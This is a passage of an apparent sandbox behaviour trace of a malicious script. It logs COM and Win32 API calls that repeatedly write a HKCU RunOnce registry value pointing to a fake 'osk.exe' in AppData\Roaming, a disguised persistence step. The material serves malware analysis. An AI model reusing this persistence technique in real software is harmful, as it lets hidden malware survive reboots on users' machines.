(This=0x7b4480) returned 0x1 [0082.533] SetTimer (hWnd=0x20280, nIDEvent=0x20f6, uElapse=0xa, lpTimerFunc=0x0) returned 0x20f6 [0082.533] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0082.555] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0082.555] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0082.555] KillTimer (hWnd=0x20280, uIDEvent=0x20f6) returned 1 [0082.555] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0082.555] CoGetObjectContext (in: riid=0x74a40270*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x33f3b0 | out: ppv=0x33f3b0*=0x787518) returned 0x0 [0082.555] IUnknown:Release (This=0x787518) returned 0x1 [0082.556] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x2b53a00, 
riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x33f02c*="GetFile", cNames=0x1, lcid=0x409, rgDispId=0x33f050 | out: rgDispId=0x33f050*=10012) returned 0x0 [0082.556] FileSystemObject:IUnknown:AddRef (This=0x2b53a00) returned 0x2 [0082.556] FileSystemObject:IDispatch:Invoke (in: This=0x2b53a00, dispIdMember=10012, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x3, pDispParams=0x33eff4*(rgvarg=([0]=0x33ef98*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="osk.exe", varVal2=0x1113d0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x33f228, pExcepInfo=0x33f008, puArgErr=0x33f004 | out: pDispParams=0x33eff4*(rgvarg=([0]=0x33ef98*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="osk.exe", varVal2=0x1113d0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x33f228*(varType=0x9, wReserved1=0x0, wReserved2=0xf288, wReserved3=0x33, varVal1=0x2b53cec, varVal2=0x0), pExcepInfo=0x33f008*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x33f004*=0x2b53a00) returned 0x0 [0082.556] FileSystemObject:IUnknown:Release (This=0x2b53a00) returned 0x1 [0082.556] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45700*(Data1=0x9bcb0016, Data2=0xbc2a, Data3=0x47b7, Data4=([0]=0x81, [1]=0x54, [2]=0x85, [3]=0x80, [4]=0xa1, [5]=0x5c, [6]=0x3f, [7]=0xf0)), ppvObject=0x33ef54 | out: ppvObject=0x33ef54*=0x0) returned 0x80004002 [0082.556] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a455f8*(Data1=0x719c3050, Data2=0xf9d3, Data3=0x11cf, Data4=([0]=0xa4, [1]=0x93, [2]=0x0, [3]=0x40, [4]=0x5, [5]=0x23, [6]=0xa8, [7]=0xa0)), ppvObject=0x33ef50 | out: 
ppvObject=0x33ef50*=0x0) returned 0x80004002 [0082.556] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45608*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x33ef4c | out: ppvObject=0x33ef4c*=0x0) returned 0x80004002 [0082.556] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45764*(Data1=0xa0aac450, Data2=0xa77b, Data3=0x11cf, Data4=([0]=0x91, [1]=0xd0, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xc1, [6]=0x4a, [7]=0x7c)), ppvObject=0x33ef48 | out: ppvObject=0x33ef48*=0x0) returned 0x80004002 [0082.556] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45710*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x33ef44 | out: ppvObject=0x33ef44*=0x2b53cec) returned 0x0 [0082.556] FileSystemObject:IUnknown:Release (This=0x2b53cec) returned 0x7b [0082.556] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x2b53cec, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x33f0ac*="Path", cNames=0x1, lcid=0x409, rgDispId=0x33f0d0 | out: rgDispId=0x33f0d0*=0) returned 0x0 [0082.556] FileSystemObject:IUnknown:AddRef (This=0x2b53cec) returned 0x7c [0082.556] FileSystemObject:IDispatch:Invoke (in: This=0x2b53cec, dispIdMember=0, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x2, pDispParams=0x33f074*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x2b53840, pExcepInfo=0x33f088, puArgErr=0x33f084 | out: pDispParams=0x33f074*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x2b53840*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="C:\\Users\\5p5NrGJn0jS 
HALPmcxz\\AppData\\Roaming\\osk.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\osk.exe"), varVal2=0x0), pExcepInfo=0x33f088*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x33f084*=0x2b53cec) returned 0x0 [0082.557] FileSystemObject:IUnknown:Release (This=0x2b53cec) returned 0x7b [0082.557] IUnknown:AddRef (This=0x7a9740) returned 0x2 [0082.557] ITypeInfo:LocalGetIDsOfNames (This=0x7a9740) returned 0x0 [0082.557] IUnknown:Release (This=0x7a9740) returned 0x1 [0082.557] IUnknown:AddRef (This=0x7a9740) returned 0x2 [0082.557] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0 [0082.557] ITypeInfo:LocalInvoke (This=0x7a9740) returned 0x0 [0082.558] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 61 [0082.558] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", cchWideChar=-1, lpMultiByteStr=0x33ec50, cbMultiByte=61, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", lpUsedDefaultChar=0x0) returned 61 [0082.558] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0082.558] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0082.558] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", 
cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 54 [0082.558] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cchWideChar=-1, lpMultiByteStr=0x33ec10, cbMultiByte=54, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", lpUsedDefaultChar=0x0) returned 54 [0082.558] lstrlenA (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 53 [0082.558] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0082.558] RegCloseKey (hKey=0x280) returned 0x0 [0082.558] IUnknown:Release (This=0x7a9740) returned 0x1 [0082.558] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0082.558] SetTimer (hWnd=0x20280, nIDEvent=0x20f7, uElapse=0xa, lpTimerFunc=0x0) returned 0x20f7 [0082.558] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0082.561] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0082.561] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0082.561] KillTimer (hWnd=0x20280, uIDEvent=0x20f7) returned 1 [0082.561] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0082.561] CoGetObjectContext (in: riid=0x74a40270*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x33f3b0 | out: ppv=0x33f3b0*=0x787518) returned 0x0 [0082.561] IUnknown:Release (This=0x787518) returned 0x1 [0082.561] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x2b53a00, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, 
[7]=0x0)), rgszNames=0x33f02c*="GetFile", cNames=0x1, lcid=0x409, rgDispId=0x33f050 | out: rgDispId=0x33f050*=10012) returned 0x0 [0082.561] FileSystemObject:IUnknown:AddRef (This=0x2b53a00) returned 0x2 [0082.561] FileSystemObject:IDispatch:Invoke (in: This=0x2b53a00, dispIdMember=10012, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x3, pDispParams=0x33eff4*(rgvarg=([0]=0x33ef98*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="osk.exe", varVal2=0x1113d0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x33f228, pExcepInfo=0x33f008, puArgErr=0x33f004 | out: pDispParams=0x33eff4*(rgvarg=([0]=0x33ef98*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="osk.exe", varVal2=0x1113d0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x33f228*(varType=0x9, wReserved1=0x0, wReserved2=0xf288, wReserved3=0x33, varVal1=0x2b53cec, varVal2=0x0), pExcepInfo=0x33f008*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x33f004*=0x2b53a00) returned 0x0 [0082.561] FileSystemObject:IUnknown:Release (This=0x2b53a00) returned 0x1 [0082.561] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45700*(Data1=0x9bcb0016, Data2=0xbc2a, Data3=0x47b7, Data4=([0]=0x81, [1]=0x54, [2]=0x85, [3]=0x80, [4]=0xa1, [5]=0x5c, [6]=0x3f, [7]=0xf0)), ppvObject=0x33ef54 | out: ppvObject=0x33ef54*=0x0) returned 0x80004002 [0082.561] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a455f8*(Data1=0x719c3050, Data2=0xf9d3, Data3=0x11cf, Data4=([0]=0xa4, [1]=0x93, [2]=0x0, [3]=0x40, [4]=0x5, [5]=0x23, [6]=0xa8, [7]=0xa0)), ppvObject=0x33ef50 | out: ppvObject=0x33ef50*=0x0) returned 0x80004002 [0082.561] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, 
riid=0x74a45608*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x33ef4c | out: ppvObject=0x33ef4c*=0x0) returned 0x80004002 [0082.562] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45764*(Data1=0xa0aac450, Data2=0xa77b, Data3=0x11cf, Data4=([0]=0x91, [1]=0xd0, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xc1, [6]=0x4a, [7]=0x7c)), ppvObject=0x33ef48 | out: ppvObject=0x33ef48*=0x0) returned 0x80004002 [0082.562] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45710*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x33ef44 | out: ppvObject=0x33ef44*=0x2b53cec) returned 0x0 [0082.562] FileSystemObject:IUnknown:Release (This=0x2b53cec) returned 0x7c [0082.562] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x2b53cec, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x33f0ac*="Path", cNames=0x1, lcid=0x409, rgDispId=0x33f0d0 | out: rgDispId=0x33f0d0*=0) returned 0x0 [0082.562] FileSystemObject:IUnknown:AddRef (This=0x2b53cec) returned 0x7d [0082.562] FileSystemObject:IDispatch:Invoke (in: This=0x2b53cec, dispIdMember=0, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x2, pDispParams=0x33f074*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x2b53840, pExcepInfo=0x33f088, puArgErr=0x33f084 | out: pDispParams=0x33f074*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x2b53840*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\osk.exe"), varVal2=0x0), 
pExcepInfo=0x33f088*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x33f084*=0x2b53cec) returned 0x0 [0082.562] FileSystemObject:IUnknown:Release (This=0x2b53cec) returned 0x7c [0082.563] IUnknown:AddRef (This=0x7a9740) returned 0x2 [0082.563] ITypeInfo:LocalGetIDsOfNames (This=0x7a9740) returned 0x0 [0082.563] IUnknown:Release (This=0x7a9740) returned 0x1 [0082.563] IUnknown:AddRef (This=0x7a9740) returned 0x2 [0082.563] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0 [0082.563] ITypeInfo:LocalInvoke (This=0x7a9740) returned 0x0 [0082.563] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 61 [0082.563] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", cchWideChar=-1, lpMultiByteStr=0x33ec50, cbMultiByte=61, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", lpUsedDefaultChar=0x0) returned 61 [0082.563] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0082.563] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0082.563] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, 
lpUsedDefaultChar=0x0) returned 54 [0082.563] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cchWideChar=-1, lpMultiByteStr=0x33ec10, cbMultiByte=54, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", lpUsedDefaultChar=0x0) returned 54 [0082.563] lstrlenA (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 53 [0082.563] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0082.563] RegCloseKey (hKey=0x280) returned 0x0 [0082.563] IUnknown:Release (This=0x7a9740) returned 0x1 [0082.564] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0082.564] SetTimer (hWnd=0x20280, nIDEvent=0x20f8, uElapse=0xa, lpTimerFunc=0x0) returned 0x20f8 [0082.564] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0082.577] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0082.577] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0082.577] KillTimer (hWnd=0x20280, uIDEvent=0x20f8) returned 1 [0082.577] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0082.577] CoGetObjectContext (in: riid=0x74a40270*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x33f3b0 | out: ppv=0x33f3b0*=0x787518) returned 0x0 [0082.577] IUnknown:Release (This=0x787518) returned 0x1 [0082.578] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x2b53a00, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x33f02c*="GetFile", cNames=0x1, lcid=0x409, rgDispId=0x33f050 | out: rgDispId=0x33f050*=10012) 
returned 0x0 [0082.578] FileSystemObject:IUnknown:AddRef (This=0x2b53a00) returned 0x2 [0082.578] FileSystemObject:IDispatch:Invoke (in: This=0x2b53a00, dispIdMember=10012, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x3, pDispParams=0x33eff4*(rgvarg=([0]=0x33ef98*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="osk.exe", varVal2=0x1113d0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x33f228, pExcepInfo=0x33f008, puArgErr=0x33f004 | out: pDispParams=0x33eff4*(rgvarg=([0]=0x33ef98*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="osk.exe", varVal2=0x1113d0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x33f228*(varType=0x9, wReserved1=0x0, wReserved2=0xf288, wReserved3=0x33, varVal1=0x2b53cec, varVal2=0x0), pExcepInfo=0x33f008*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x33f004*=0x2b53a00) returned 0x0 [0082.578] FileSystemObject:IUnknown:Release (This=0x2b53a00) returned 0x1 [0082.578] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45700*(Data1=0x9bcb0016, Data2=0xbc2a, Data3=0x47b7, Data4=([0]=0x81, [1]=0x54, [2]=0x85, [3]=0x80, [4]=0xa1, [5]=0x5c, [6]=0x3f, [7]=0xf0)), ppvObject=0x33ef54 | out: ppvObject=0x33ef54*=0x0) returned 0x80004002 [0082.578] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a455f8*(Data1=0x719c3050, Data2=0xf9d3, Data3=0x11cf, Data4=([0]=0xa4, [1]=0x93, [2]=0x0, [3]=0x40, [4]=0x5, [5]=0x23, [6]=0xa8, [7]=0xa0)), ppvObject=0x33ef50 | out: ppvObject=0x33ef50*=0x0) returned 0x80004002 [0082.578] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45608*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, 
[7]=0xa9)), ppvObject=0x33ef4c | out: ppvObject=0x33ef4c*=0x0) returned 0x80004002 [0082.578] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45764*(Data1=0xa0aac450, Data2=0xa77b, Data3=0x11cf, Data4=([0]=0x91, [1]=0xd0, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xc1, [6]=0x4a, [7]=0x7c)), ppvObject=0x33ef48 | out: ppvObject=0x33ef48*=0x0) returned 0x80004002 [0082.578] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45710*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x33ef44 | out: ppvObject=0x33ef44*=0x2b53cec) returned 0x0 [0082.578] FileSystemObject:IUnknown:Release (This=0x2b53cec) returned 0x7d [0082.578] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x2b53cec, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x33f0ac*="Path", cNames=0x1, lcid=0x409, rgDispId=0x33f0d0 | out: rgDispId=0x33f0d0*=0) returned 0x0 [0082.578] FileSystemObject:IUnknown:AddRef (This=0x2b53cec) returned 0x7e [0082.578] FileSystemObject:IDispatch:Invoke (in: This=0x2b53cec, dispIdMember=0, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x2, pDispParams=0x33f074*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x2b53840, pExcepInfo=0x33f088, puArgErr=0x33f084 | out: pDispParams=0x33f074*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x2b53840*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\osk.exe"), varVal2=0x0), pExcepInfo=0x33f088*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, 
pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x33f084*=0x2b53cec) returned 0x0 [0082.579] FileSystemObject:IUnknown:Release (This=0x2b53cec) returned 0x7d [0082.579] IUnknown:AddRef (This=0x7a9740) returned 0x2 [0082.579] ITypeInfo:LocalGetIDsOfNames (This=0x7a9740) returned 0x0 [0082.579] IUnknown:Release (This=0x7a9740) returned 0x1 [0082.580] IUnknown:AddRef (This=0x7a9740) returned 0x2 [0082.580] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0 [0082.580] ITypeInfo:LocalInvoke (This=0x7a9740) returned 0x0 [0082.580] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 61 [0082.580] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", cchWideChar=-1, lpMultiByteStr=0x33ec50, cbMultiByte=61, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", lpUsedDefaultChar=0x0) returned 61 [0082.580] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0082.580] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0082.580] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 54 [0082.580] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS 
